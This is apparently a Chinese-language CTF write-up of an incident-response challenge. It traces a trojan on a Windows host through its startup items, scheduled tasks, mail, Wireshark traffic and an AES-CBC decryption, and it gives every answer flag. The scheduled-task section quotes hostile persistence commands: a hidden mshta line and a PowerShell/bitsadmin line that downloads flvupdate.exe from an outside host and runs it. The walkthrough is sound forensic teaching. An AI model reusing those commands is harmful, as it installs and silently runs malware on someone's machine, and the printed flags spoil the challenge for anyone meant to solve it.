提示文章写完后目录可以自动生成如何生成可参考右边的帮助文档文章目录前置准备题目列表应急溯源系统启动项系统服务网络连接计划任务检查启动项 / 计划任务中隐藏 flag本机留下的隐藏flag受控源头隐藏的 flag分析流量获得压缩包中得到答案通过 aes 解密得到的 flag总结前置准备某单位网管日常巡检中发现某员工电脑IP192.168.116.123存在异常外连及数据传输行为随后立即对该电脑进行断网处理并启动网络安全应急预案进行排查。文件名82f13fdc9f7078ba29c4a6dcc65d8859.7z文件大小14.8g下载链接1https://pan.baidu.com/s/1hHX8J13EWRAfm3e-qakuDw 提取码GAME下载链接2https://drive.google.com/file/d/14RBdzdozTHIwJs_tveivjwOqclcp2rhL/view解压密码3604e2f3-585a-4972-a867-3a9cc8d34c1d来源长城杯CISCN官网题目列表1. 受控机木马的回连域名及ip及端口是示例flag{xxx.com:127.0.0.1:2333}2. 受控机启动项中隐藏 flag 是3. 受控机中驻留的 flag 是4. 受控源头隐藏的 flag 是5. 分析流量获得压缩包中得到答案6. 通过 aes 解密得到的 flag这里我们下载好靶场后界面如下当前靶机地址192.168.116.123话不多说我们直接开始溯源过程应急溯源我们首先打开“雷鸟Thunderbird邮件系统发现并没有任何可用的信息所以只能换到”火绒剑“的记录是否存在有用信息系统启动项查看系统启动项暂时没有发现可疑信息系统服务随后切换页面好像是个”恶意程序 / 脚本“不确定先记录下来之后再去求证网络连接翻看网络连接的时候发现了了一个陌生的IP地址外连192.168.116.130有可能是攻击者控制的机器基于上述的判断我们得到相应的进程名字为flvupdate.exe所以我们用everything去查找一下相应程序的文件位置得到文件的位置C:\Users\Public\Documents\flvupdate.exe进入到相应文件搜集更多信息执行该程序看看其回连地址是多少计划任务同时我们查看”计划任务“再次确认了该恶意程序的可能性mshtajavascript:var shnew ActiveXObject(WScript.Shell); sh.Run(cmd /c taskkill /f /im flvupdate.exe start C:\\Users\\Public\\Documents\\flvupdate.exe, 0, true); close();powershell-WindowStyleHidden-Commandbitsadmin /transfer mydownloadjob /download /priority high http://miscflvol.com/flvupdate.exe C:\Users\Public\documents\flvupdate.exe; start C:\Users\Public\documents\flvupdate.exe将其扔进沙箱里进行分析最后也是得到了它的域名miscsecure.com综上所述我们可以推测得到第一题的flagflag{miscsecure.com:192.168.116.130:443}检查启动项 / 计划任务中隐藏 flag根据题目给出信息我们直接缩小了查找的范围开机启动项或者输入命令msconfig也可以直接查看启动项不过简单观察了一下好像没找到可疑程序flag更是无从谈起那就打开计划任务再检查一下taskschd.msc成功发现了flagf^l^a^g^:JiM3ODsmIzEwNTsmIzk5OyYjMTAxOyYjNjUyOTI7JiMxMDI7JiMxMDg7JiM5NzsmIzEwMzsmIzMyOyYjMTA1OyYjMTE1OyYjMzI7JiMxMjM7JiM2NTsmIzY5OyYjODM7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzk1OyYjMTA1OyYjMTE1OyYjOTU7JiM5NzsmIzExMDsmIzk1OyYjMTAxOyYjMTIwOyYjOTk7JiMxMDE7JiMxMDg7JiMxMDg7JiMxMDE7JiMxMTA7JiMxMTY7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzEyNTs首先对其Base64解密发现还有一层HTML加密再次对其进行解密即可获取flagflag如下flag{AES_encryption_algorithm_is_an_excellent_encryption_algorithm}本机留下的隐藏flag这里我检查了”隐藏用户“以及”系统日志“均未发现可疑信息也没有远程爆破的记录随后想到之前的flag字符串f^l^a^g^所以尝试一下全局搜索发现了一个压缩包放到本地进行分析看到文件开头发现是用7z.zip进行压缩加密的所以我们加个zip后缀尝试一下密码恶意软件的名字 flvupdate成功得到了结果flag{Timeline_correlation_is_a_very_important_part_of_the_digital_forensics_process}受控源头隐藏的 flag这里刚好没了思路但看了一眼上面的flag信息时间线相关性是数字取证过程中非常重要的一部分嗯根据提示我们只能再次打开之前的”雷鸟“邮件可以看到的是有1000条信息人工查找肯定是不可能的所以我们需要结合一下攻击者的攻击时间2024/11/20 18:55也是缩小了搜寻范围看了几个邮件发现有一个是有文件的附件其他都是正常的格式下载扔到沙箱里分析既然是恶意邮件那我们就重点筛选该发件人safeservice.autorevertech.cn的来往记录可以看到有一共两条信息打开该邮件的瞬间弹出了一个cmd窗口随后消失不见所以这里我到进程里去查看了一下果然发现了外连地址随后查看一下邮件源代码经过base64解码——url解码——base64解码成功得到了flagbase64解码 Hello, this is the access link,ahrefhttps://autorevertech.com?key%61%47%6E%76%76%49%78%6D%62%47%46%6E%49%47%6C%7A%49%48%74%55%61%47%55%67%53%6D%39%31%63%6D%35%6C%65%53%42%30%62%79%42%30%61%47%55%67%56%32%56%7A%64%48%30%3Dplease click and get/a. Thank you very much!url解码aGnvvIxmbGFnIGlzIHtUaGUgSm91cm5leSB0byB0aGUgV2VzdH0base64解码 hiflag is{The Journey to the West}–分析流量获得压缩包中得到答案我们搜索.pcap后缀也是成功发现了流量包这里将流量包下载到本地不熟悉流量分析的师傅可以看看下列文章Wireshark流量分析案例篇手把手教学基础篇Solar月赛emergency靶场溯源过程内含靶机下载以及流量分析记一次某公司流量应急溯源分析附带下载链接首先查一下统计IP找到通信最多的两个IP地址我们还可以看到在某一时间段还存在”文件数据“的传输在Wireshark里我们发现了许多文件传输的记录再将其大小进行排序打开相应记录在底部发现了压缩包的名称Everything.zip打开后却发现flag文档是加密的根据底部的提示将其解码得到信息时间线关联非常重要死马当活马医直接把它当密码试试。。。得到了flagflag{a1b2c3d4e5f67890abcdef1234567890-2f4d90a1b7c8e2349d3f56e0a9b01b8a-CBC}–通过 aes 解密得到的 flag要想得到flag我们需要知道的是aes加密的密钥key和偏移量IV以及加密模式CBC对于上一题的答案进行分析可以确定 AES 的参数Mode: CBCKey: a1b2c3d4e5f67890abcdef1234567890iv: 2f4d90a1b7c8e2349d3f56e0a9b01b8a在Wireshark里输入过滤式ip.addr192.168.116.130 and http发现了很多记录发现很像aes加密的字符串解密后发现不是继续找过滤字段长度为16倍数的data.len16and data.len %160and ip.addr192.168.116.130将其解码后得到flagfromCrypto.CipherimportAESfrombinasciiimportunhexlify key_hexa1b2c3d4e5f67890abcdef1234567890iv_hex2f4d90a1b7c8e2349d3f56e0a9b01b8act_hexa7b86dfc266043b2a7750f0a9c4a02a269bc72acc55f501d7bc37af237b6abc280a5d0ddb393f79a07bfa5cc0a432086keyunhexlify(key_hex)ivunhexlify(iv_hex)ctunhexlify(ct_hex)cipherAES.new(key,AES.MODE_CBC,iv)ptcipher.decrypt(ct)# 去PKCS7 paddingpad_lenpt[-1]ptpt[:-pad_len]print(pt.decode())flag如下flag{Hey, keep going andlookforanother flag}总结本教程基于威胁流量分析与WinFT取证思路围绕一次完整的受控主机溯源过程展开。从流量抓包、启动项分析到驻留文件定位再结合压缩包提取与AES解密还原攻击链路与关键信息。内容覆盖木马回连特征识别、系统持久化痕迹检测及密文数据还原等多个环节帮助构建从网络层到主机层的完整分析路径用于理解常见攻击行为的溯源方法与取证逻辑。
